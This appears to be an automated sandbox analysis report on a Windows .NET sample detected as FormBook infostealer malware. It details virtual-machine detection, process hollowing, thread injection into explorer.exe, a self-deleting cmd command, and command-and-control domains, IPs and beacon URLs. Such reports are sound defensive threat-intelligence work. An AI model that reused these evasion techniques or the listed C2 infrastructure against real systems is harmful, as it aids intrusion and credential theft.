      Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
      Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\ejecutable1.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\ejecutable1.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000108604 second address: 000000000010860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 000000000010898E second address: 0000000000108994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\ejecutable1.exe TID: 1480Thread sleep time: -45730s >= -30000s
      Source: C:\Users\user\Desktop\ejecutable1.exe TID: 1348Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\explorer.exe TID: 2908Thread sleep time: -50000s >= -30000s
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_004088C0 rdtsc
      Source: C:\Users\user\Desktop\ejecutable1.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess information queried: ProcessInformation
      Source: C:\Users\user\Desktop\ejecutable1.exeThread delayed: delay time: 45730
      Source: C:\Users\user\Desktop\ejecutable1.exeThread delayed: delay time: 922337203685477
      Source: explorer.exe, 00000003.00000000.413682610.000000000457A000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
      Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
      Source: explorer.exe, 00000003.00000000.408183204.00000000002C7000.00000004.00000020.sdmpBinary or memory string: @z.SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000Z
      Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmpBinary or memory string: vmware
      Source: explorer.exe, 00000003.00000000.413682610.000000000457A000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
      Source: explorer.exe, 00000003.00000000.463438478.00000000044E7000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
      Source: explorer.exe, 00000003.00000000.408138486.000000000029B000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
      Source: explorer.exe, 00000003.00000000.413770462.00000000045D6000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
      Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_004088C0 rdtsc
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_008A26F8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\msdt.exeCode function: 4_2_025A26F8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\ejecutable1.exeCode function: 2_2_00409B30 LdrLoadDll,
      Source: C:\Users\user\Desktop\ejecutable1.exeMemory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeDomain query: www.dunedinhyperlocal.com
      Source: C:\Windows\explorer.exeDomain query: www.multicoininvestment.com
      Source: C:\Windows\explorer.exeDomain query: www.wwiilive.com
      Source: C:\Windows\explorer.exeDomain query: www.institutosamar.com
      Source: C:\Windows\explorer.exeDomain query: www.petersonmovingco.com
      Source: C:\Windows\explorer.exeDomain query: www.quinnwebster.top
      Source: C:\Windows\explorer.exeDomain query: www.lianxiwan.xyz
      Source: C:\Windows\explorer.exeDomain query: www.oinfoproduto.com
      Source: C:\Windows\explorer.exeDomain query: www.theseattlenotary.com
      Sample uses process hollowing techniqueShow sources
      Source: C:\Users\user\Desktop\ejecutable1.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: BE0000
      Maps a DLL or memory area into another processShow sources
      Source: C:\Users\user\Desktop\ejecutable1.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\ejecutable1.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\ejecutable1.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Injects a PE file into a foreign processesShow sources
      Source: C:\Users\user\Desktop\ejecutable1.exeMemory written: C:\Users\user\Desktop\ejecutable1.exe base: 400000 value starts with: 4D5A
      Queues an APC in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\ejecutable1.exeThread APC queued: target process: C:\Windows\explorer.exe
      Modifies the context of a thread in another process (thread injection)Show sources
      Source: C:\Users\user\Desktop\ejecutable1.exeThread register set: target process: 1764
      Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 1764
      Source: C:\Users\user\Desktop\ejecutable1.exeProcess created: C:\Users\user\Desktop\ejecutable1.exe C:\Users\user\Desktop\ejecutable1.exe
      Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable1.exe'
      Source: explorer.exe, 00000003.00000000.408406807.0000000000750000.00000002.00020000.sdmp, msdt.exe, 00000004.00000002.667262580.0000000000CE0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
      Source: explorer.exe, 00000003.00000000.408406807.0000000000750000.00000002.00020000.sdmp, msdt.exe, 00000004.00000002.667262580.0000000000CE0000.00000002.00020000.sdmpBinary or memory string: !Progman
      Source: explorer.exe, 00000003.00000000.408406807.0000000000750000.00000002.00020000.sdmp, msdt.exe, 00000004.00000002.667262580.0000000000CE0000.00000002.00020000.sdmpBinary or memory string: Program Manager<
      Source: C:\Users\user\Desktop\ejecutable1.exeQueries volume information: C:\Users\user\Desktop\ejecutable1.exe VolumeInformation
      Source: C:\Users\user\Desktop\ejecutable1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing12DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion2Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 491544 Sample: ejecutable1.exe Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 32 www.lianxiwan.xyz 2->32 34 www.area-arquitectos.com 2->34 40 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 6 other signatures 2->46 10 ejecutable1.exe 1 5 2->10         started        signatures3 process4 signatures5 58 Tries to detect virtualization through RDTSC time measurements 10->58 60 Injects a PE file into a foreign processes 10->60 13 ejecutable1.exe 10->13         started        process6 signatures7 62 Modifies the context of a thread in another process (thread injection) 13->62 64 Maps a DLL or memory area into another process 13->64 66 Sample uses process hollowing technique 13->66 68 Queues an APC in another process (thread injection) 13->68 16 explorer.exe 13->16 injected process8 dnsIp9 26 oinfoproduto.com 216.172.172.208, 49167, 80 UNIFIEDLAYER-AS-1US United States 16->26 28 www.lianxiwan.xyz 101.35.124.222, 80 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN China 16->28 30 13 other IPs or domains 16->30 36 System process connects to network (likely due to code injection or exploit) 16->36 38 Performs DNS queries to domains with low reputation 16->38 20 msdt.exe 16->20         started        signatures10 process11 signatures12 48 Self deletion via cmd delete 20->48 50 Modifies the context of a thread in another process (thread injection) 20->50 52 Maps a DLL or memory area into another process 20->52 54 Tries to detect virtualization through RDTSC time measurements 20->54 23 cmd.exe 20->23         started        process13 signatures14 56 Deletes itself after installation 23->56

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      ejecutable1.exe37%VirustotalBrowse
      ejecutable1.exe13%ReversingLabsByteCode-MSIL.Spyware.Noon

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      2.2.ejecutable1.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://cdn.jsinit.directfwd.com/sk-jspark_init.php0%Avira URL Cloudsafe
      http://www.quinnwebster.top/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=X52t7rVeaYGOvGTdnQUffRZcqF2Cx7WZGoYk6rC/HKvqONPbs0ItwbG7EjAhog3TNS4z+A==0%Avira URL Cloudsafe
      http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
      http://www.rspb.org.uk/wildlife/birdguide/name/0%Avira URL Cloudsafe
      http://www.oinfoproduto.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=iGR+5Iun3qB2MqfdIYMGDL0AT8nSBE6bMfK6r+1aL2UXxRazRBC9SoS0x9BZPXZuDFcMhw==0%Avira URL Cloudsafe
      http://www.theseattlenotary.com/u4an/?1bxhyLu=VfCS01mkQGOjQhDskfurykOlS3JM86bPzWlU8yjKrYpz8teuAGkOmvtPa8vVPydcTYndOQ==&a8a=O6e4vnipWHrd6Lz0%Avira URL Cloudsafe
      http://www.iis.fhg.de/audioPA0%URL Reputationsafe
      http://www.mozilla.com00%URL Reputationsafe
      http://www.petersonmovingco.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=1NdkLOHGjYgchrzbDiWeYorfFjsi8IQ9moMk+khmjZ8HoIOkAHeJOPevVb4lI15O4YwMeA==0%Avira URL Cloudsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://treyresearch.net0%URL Reputationsafe
      http://java.sun.com0%Avira URL Cloudsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://www.wwiilive.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw==0%Avira URL Cloudsafe
      http://computername/printers/printername/.printer0%Avira URL Cloudsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://servername/isapibackend.dll0%Avira URL Cloudsafe
      http://www.lianxiwan.xyz/u4an/?1bxhyLu=2dVJIgnicdapxBfC0e0%Avira URL Cloudsafe
      http://www.multicoininvestment.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=IweMS5AD1Z8aBlnPYfnQfVfd8bpTLSXzmKGHl0Em7c4kxOia/Ddx83+xf6gfPzYK0colLA==0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      theseattlenotary.com
      		162.0.232.162
      		truefalse
        		high
        www.petersonmovingco.com
        		216.239.32.21
        		truefalse
          		high
          oinfoproduto.com
          		216.172.172.208
          		truefalse
            		high
            www.area-arquitectos.com
            		93.185.100.223
            		truefalse
              		high
              dunedinhyperlocal.com
              		184.168.131.241
              		truefalse
                		high
                quinnwebster.top
                		162.251.85.174
                		truefalse
                  		high
                  www.lianxiwan.xyz
                  		101.35.124.222
                  		truefalse
                    		high
                    wwiilive.com
                    		34.102.136.180
                    		truefalse
                      		high
                      multicoininvestment.com
                      		162.0.229.241
                      		truefalse
                        		high
                        www.dunedinhyperlocal.com
                        		unknown
                        		unknownfalse
                          		high
                          www.multicoininvestment.com
                          		unknown
                          		unknownfalse
                            		high
                            www.wwiilive.com
                            		unknown
                            		unknownfalse
                              		high
                              www.institutosamar.com
                              		unknown
                              		unknownfalse
                                		high
                                www.quinnwebster.top
                                		unknown
                                		unknownfalse
                                  		high
                                  www.oinfoproduto.com
                                  		unknown
                                  		unknownfalse
                                    		high
                                    www.theseattlenotary.com
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      http://www.quinnwebster.top/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=X52t7rVeaYGOvGTdnQUffRZcqF2Cx7WZGoYk6rC/HKvqONPbs0ItwbG7EjAhog3TNS4z+A==false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.oinfoproduto.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=iGR+5Iun3qB2MqfdIYMGDL0AT8nSBE6bMfK6r+1aL2UXxRazRBC9SoS0x9BZPXZuDFcMhw==false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.theseattlenotary.com/u4an/?1bxhyLu=VfCS01mkQGOjQhDskfurykOlS3JM86bPzWlU8yjKrYpz8teuAGkOmvtPa8vVPydcTYndOQ==&a8a=O6e4vnipWHrd6Lztrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.petersonmovingco.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=1NdkLOHGjYgchrzbDiWeYorfFjsi8IQ9moMk+khmjZ8HoIOkAHeJOPevVb4lI15O4YwMeA==false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.wwiilive.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw==false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.multicoininvestment.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=IweMS5AD1Z8aBlnPYfnQfVfd8bpTLSXzmKGHl0Em7c4kxOia/Ddx83+xf6gfPzYK0colLA==false
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://cdn.jsinit.directfwd.com/sk-jspark_init.phpmsdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.windows.com/pctv.explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmpfalse
                                        		high
                                        http://investor.msn.comexplorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmpfalse
                                          		high
                                          http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmpfalse
                                            		high
                                            http://wellformedweb.org/CommentAPI/explorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.rspb.org.uk/wildlife/birdguide/name/ejecutable1.exe, ejecutable1.exe, 00000002.00000000.405132537.0000000000F52000.00000020.00020000.sdmp, msdt.exe, 00000004.00000002.668352306.0000000002A87000.00000004.00020000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.iis.fhg.de/audioPAexplorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.mozilla.com0explorer.exe, 00000003.00000000.414954186.0000000007147000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://business.google.commsdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmpfalse
                                              		high
                                              http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.hotmail.com/oeexplorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmpfalse
                                                		high
                                                http://treyresearch.netexplorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://business.google.com/msdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmpfalse
                                                  		high
                                                  http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmpfalse
                                                    		high
                                                    http://java.sun.comexplorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.icra.org/vocabulary/.explorer.exe, 00000003.00000000.426818288.0000000002CC7000.00000002.00020000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000003.00000000.424655585.0000000001BE0000.00000002.00020000.sdmpfalse
                                                      		high
                                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000003.00000000.433820327.0000000008434000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://workspace.google.commsdt.exe, 00000004.00000002.668527574.0000000002C02000.00000004.00020000.sdmpfalse
                                                          		high
                                                          http://investor.msn.com/explorer.exe, 00000003.00000000.426550958.0000000002AE0000.00000002.00020000.sdmpfalse
                                                            		high
                                                            http://www.piriform.com/ccleanerexplorer.exe, 00000003.00000000.413576733.0000000004513000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://computername/printers/printername/.printerexplorer.exe, 00000003.00000000.463753324.0000000004650000.00000002.00020000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		low
                                                              http://www.%s.comPAexplorer.exe, 00000003.00000000.424655585.0000000001BE0000.00000002.00020000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		low
                                                              http://www.autoitscript.com/autoit3explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmpfalse
                                                                		high
                                                                https://support.mozilla.orgexplorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmpfalse
                                                                  		high
                                                                  http://servername/isapibackend.dllexplorer.exe, 00000003.00000000.428142762.0000000003E50000.00000002.00020000.sdmp, msdt.exe, 00000004.00000002.667305054.00000000020E0000.00000002.00020000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		low
                                                                  http://www.lianxiwan.xyz/u4an/?1bxhyLu=2dVJIgnicdapxBfC0emsdt.exe, 00000004.00000002.666538687.00000000003F9000.00000004.00000020.sdmp, msdt.exe, 00000004.00000002.666548050.0000000000406000.00000004.00000020.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown

                                                                  Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  101.35.124.222
                                                                  		www.lianxiwan.xyzChina
                                                                  		132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNfalse
                                                                  162.251.85.174
                                                                  		quinnwebster.topUnited States
                                                                  		394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                                  162.0.229.241
                                                                  		multicoininvestment.comCanada
                                                                  		22612NAMECHEAP-NETUSfalse
                                                                  216.239.32.21
                                                                  		www.petersonmovingco.comUnited States
                                                                  		15169GOOGLEUSfalse
                                                                  34.102.136.180
                                                                  		wwiilive.comUnited States
                                                                  		15169GOOGLEUSfalse
                                                                  184.168.131.241
                                                                  		dunedinhyperlocal.comUnited States
                                                                  		26496AS-26496-GO-DADDY-COM-LLCUSfalse
                                                                  162.0.232.162
                                                                  		theseattlenotary.comCanada
                                                                  		22612NAMECHEAP-NETUSfalse
                                                                  216.172.172.208
                                                                  		oinfoproduto.comUnited States
                                                                  		46606UNIFIEDLAYER-AS-1USfalse

                                                                  General Information

                                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                                  Analysis ID:491544
                                                                  Start date:27.09.2021
                                                                  Start time:17:30:16
                                                                  Joe Sandbox Product:CloudBasic
                                                                  Overall analysis duration:0h 12m 42s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:light
                                                                  Sample file name:ejecutable1.exe
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                  Number of analysed new started processes analysed:8
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • HDC enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.evad.winEXE@6/0@11/8
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HDC Information:
                                                                  • Successful, ratio: 21.3% (good quality ratio 20.5%)
                                                                  • Quality average: 72.8%
                                                                  • Quality standard deviation: 27.8%
                                                                  HCA Information:
                                                                  • Successful, ratio: 100%
                                                                  • Number of executed functions: 0
                                                                  • Number of non-executed functions: 0
                                                                  Cookbook Comments:
                                                                  • Adjust boot time
                                                                  • Enable AMSI
                                                                  • Found application associated with file extension: .exe
                                                                  Warnings:
                                                                  Show All
                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                  • TCP Packets have been reduced to 100
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                  • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  17:31:14API Interceptor70x Sleep call for process: ejecutable1.exe modified
                                                                  17:31:36API Interceptor194x Sleep call for process: msdt.exe modified
                                                                  17:32:08API Interceptor1x Sleep call for process: explorer.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  No context

                                                                  Domains

                                                                  No context

                                                                  ASN

                                                                  No context

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  No created / dropped files found

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):6.737665264052285
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                  File name:ejecutable1.exe
                                                                  File size:840192
                                                                  MD5:ff2724ddf0ef0525e9e419db5199e96f
                                                                  SHA1:3cda3d12e93a6e06f22e205010cb6c3d674285a1
